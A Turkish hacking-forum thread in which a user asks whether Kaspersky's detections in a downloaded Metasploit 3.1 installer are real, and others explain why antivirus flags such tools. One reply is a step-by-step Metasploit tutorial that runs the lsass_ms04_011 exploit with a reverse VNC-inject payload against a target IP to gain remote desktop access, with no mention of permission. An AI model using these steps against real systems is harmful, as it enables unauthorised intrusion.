Metasploit Yardım!!
-
arkadaşlar metasploitin ana sitesinde metasploiti download etttim ve pc de haliyele indirince tarattım ve yaklaşık 4 tane trojan benzeri şeyler buldu
tespit edildi: Trojan programı Trojan-Downloader.JS.Agent.gj Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data0007//msf3/lib/rex/exploitation/.svn/text-base/heaplib.js.b64.svn-base//MIME.Broken
tespit edildi: Trojan programı Trojan-Downloader.JS.Agent.gj Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data0007//msf3/lib/rex/exploitation/heaplib.js.b64//MIME.Broken
tespit edildi: riskware not-a-virus:RemoteAdmin.Win32.NetCat Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data3097
tespit edildi: riskware not-a-virus:RemoteAdmin.Win32.WinVNC.4 Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data3106
gördüğümüz gibi karsperskyın raporuda buarkadaşlar gerçekten trojan mı var içinde yoksa karsperskymı çok hassas hani ne bilim herhangi bi protu fln kullanıyo metasploit o yüzdne olabilirm :S
çokda güzzel bi program exploit için ve üstelik anasayfasında indirdim sizce gerçekten trojanmı içeriyor yoksa pc de port fln kullandığı içinmi karspersky bu uyarıyı veriyor
daha kurmadım sizi bekliyorum........... şimdiden tşk
-
tespit edildi: Trojan programı Trojan-Downloader.JS.Agent.gj Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data0007//msf3/lib/rex/exploitation/.svn/text-base/heaplib.js.b64.svn-base//MIME.Broken tespit edildi: Trojan programı Trojan-Downloader.JS.Agent.gj Dosya: E:\yedek\PROGRAMLAR\framework-3.1.exe//stream//data0007//msf3/lib/rex/exploitation/heaplib.js.b64//MIME.Broken bu 2 dosyayı virustotale yollasana
-
ya ama bu program çok popüler ve dünyada sanırım epey bi insan kullanıyor hani ne bilim bana biras tuhaf geldi nerden
bilinebilir aslında bu firmanın bu yöntem ile pc leri ele geçirmek istemesi sonuçta bi framework uygulaması şaştım kaldım
ya bende ne güzel diyordum artık exploit sıkıntısı çekmiyeceğiz gelin bi ortak çözüme varalım olmadı rapor ederiz bu olayı
-
Metasploit ne işe yaradığını biliyorsun dimi? Trojan bulmasınında okadar doğal olması gerek
-
hacı metasploit biliyoruz exploitlerin bir framework altında toplanmış halidir daha bir sürü özelliği var dır fakat ne bilim hani neden böyle bişi algıladı ve anlamadığım
bu program üstelik anasayfasından indirlmiştir
aranızda peki bu programı kullanan oldumu ? antivirüsler uyarı fln verdimi ?
-
Bilenen en ünlü exploid programlarından birini indirmişsin içinde sayısız remotekit ve rootkit var ve kasper ötünce neden diye soruyorsun harika...anti virüs programları programın amacına bakmaz çalışma mantıgına bakar yani kendi yazdıgın bir programı bile anasayfanı degiştiriyorsa kendini sürekli replike ediyorsa felan yine öter yani sorun yok
-
sağolasın arkadaşım ya bu biras daha konuyu aydınlattı :D tşkk :D bide ben bunu kursam bu nalet olası antivirüs yine ötmeye başlıcak :D hey allam :D nerden bulaştım bu işe :D
-
Metasploit nedir?
Metasploit, popüler ve yararlı exploitlerin daha ileri seviyede özellikler eklenip, bizlerin hizmetine sunulmuş bir framework çalışmasıdır. İçerisinde şuan 90 dan fazla exploit, 75 kadar payload vardır. En güzel özelliğiyse güncellenmesidir. Programı otomatik olarak 'update' edebilirsiniz.
Kurulumdan sonra Başlat>Programlar>Metasploit Framework>MSFupdate i açıp güncelleyelim. Güncelleme bitince bunu bir mesajla haber verir ve $isim gibi birşey çıkar. 'exit komutuyla MSFupdate konsolundan çıkalım.
Artık başlayabiliriz...
1-) Başlat>Programlar>Metasploit Framework>MSFConsole u açalım. Konsoldasınız ve şu şekilde bir komut satırı çıkar; msf>
2-)
*Exploit listesine bakalım-> Bunun için 'show exploits' komutunu yazıp entar a basın.
*Listeden bize gereken exploiti belirleyelim-> Örnek olarak çok tehlikeli bir exploit olan 'lsass_ms04_011' i seçtim, bu exploit ile hedef bilgisayara trojan olmaksızın girmeye çalışacağım. Bir exploiti seçmek için şu komutu kullanırız-> 'use lsass_ms04_011' Artık komut satırı değişti ve şu oldu : 'msf lsass_ms04_011>'
3-)
*Payload seçelim-> Her exploitin mutlaka bir payload ı (kısacası saldırı çeşidi ve hedefi diyelim) vardır. Payloadları görmek için kullanmamız gereken kod 'show payloads'
Biz listenin en altındaki payloadı seçiyoruz. Eğer listedeki payloadların görevlerini görmek isterseniz 'info payloadadı' komutunu kullanın.
*Payload ıseçmek için 'set PAYLOAD payloadadı' komutunu kullanmamız gerekiyor. Biz en alttakini seçiyoruz 'set PAYLOAD'win32_reverse_vncinject'
Önemli not: Payloadı seçerken Payload büyük harfle yazılmalıdır.
4-)Artık yapmamız gereken sadece bir iki ayar kaldı. Gerekli ayarları görmek için ise 'show options' komutunu kullanıyoruz.
Karşmıza liste çıktı. Bu listedeki Required yazanlar mutlaka tanımlanmalıdır... optinal yazanlar ise size kalmış.
*Bizim örneğimizde required yazan 2 ayar var, hemen tanımlayalım.
*Sırasıyla şu komutları girelim;
'set RHOST hedefip'
'set LHOST kendinizinipadresi'
Dikkat: Required yazanların bazıları önceden tanımlıdır değiştirmeye gerek yok.
5-)Son adım. Eğer herşey yolunda gittiyse (ayarlarda hata yapmadıysak) exploiti çalıştıralım.
Bunun için ise 'exploit' komutunu yazıyoruz.
Kullandığım exploitin özelliğinden dolayı eğer başarılı olduysak uzak masaüstü bağlantısı ile karşı bilgisayara girebilirim. Bilmeyenler için: bir pencere açılır ve onun masaüstüne bağlanmış olurum, sürücülerini gezebilirim vs vs.
-----------------------------------
BAZI ÖNEMLİ KOMUTLAR
'use exploitadı' exploiti seçer
'info exploitadı' exploit hakkında bilgi verir, aynı şekilde payloadadını yazarsanır payload bilgisi verir.
'set PAYLOAD payloadadı' payloadı seçer.
'set AYARADI parametre' ayaradını yazdığınız öğeye parametre tanımlar.
'show options' yapmanız gereken özel ayarlar.
'show exploits' exploit listesi
'show payloads' payload listesi
'set RHOST hedef' hedefi ayarlamanızı sağlar.
'set LHOST ip' sizin ip adresiniz ([Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ipbul.com dan öğrenebilirsiniz)
'set RPORT 129' hedef portunu 129 yapar-siz gerekliyse değiştireceksiniz tabii
'set LPORT 5400' sizin portunuz (not:adsl kullanıyorsanız port açmayı unutmayın)
'show targets' eğer varsa hedef sistem versiyonlarını seçersiniz
'set TARGET targetno' targetno numaralı hedef sistem
'exploit' exploiti çalıştırır ayarlar tamamsa çalışır,yoksa "missing required option" hatası verir -
Hoca kaspersky'ın virüs yemiş git bilgisayarını bi güzel yıka. :|
Bilmediğin şeyleri de kurcalama bozulur sonra. :W